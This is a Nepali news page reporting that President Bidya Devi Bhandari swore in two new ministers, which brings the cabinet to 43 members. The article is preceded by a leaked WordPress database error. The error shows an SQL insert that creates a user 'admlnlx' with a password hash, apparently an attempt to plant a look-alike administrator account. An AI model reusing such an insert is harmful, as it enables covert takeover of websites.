WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B.iieeCt3Tf.WrNQM7VtaKty8uvd0U/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-01 12:23:45', '', 'admlnlx', 'admlnlx')
काठमाडौँ,माघ ६ –
राष्ट्रपति विद्यादेवी भण्डारीले नवनियुक्त मन्त्री प्रेमबहादुर सिंह र कुमार खड्कालाई पद तथा गोपनीयताको शपथ खुवाउनुभएको छ ।
राष्ट्रपति कार्यालय शीतल निवासमा आज आयोजित विशेष समारोहमा प्रधानमन्त्री पुष्पकमल दाहाल ‘प्रचण्ड’को उपस्थितिमा उहाँहरुलाई शपथ ग्रहण गराइएको हो ।
प्रधानमन्त्री दाहालले मौजुदा मन्त्रिमण्डल विस्तार गर्दै सिंहलाई खानेपानी तथा सरसफाइ र खड्कालाई महिला, बालबालिका तथा समाज कल्याण मन्त्रालयको जिम्मेवारी दिनुभएको छ ।
गत साउन २० गते गठन भएको मन्त्रिमण्डलमा सिंह र खड्का थपिनुभएपछि मन्त्रिमण्डल सदस्यको सङ्ख्या अब ४३ पुगेको छ ।
नवनियुक्त मन्त्री सिंह समाजवादी जनता दल र खड्का अखण्ड नेपाल पार्टीबाट व्यवस्थापिका–संसद्को सदस्य हुनुभएको हो । सिंह यसअघि पनि मन्त्री भइसक्नुभएको थियो भने खड्का मन्त्रिपरिषद्मा नयाँ हुनुहुन्छ । – रासस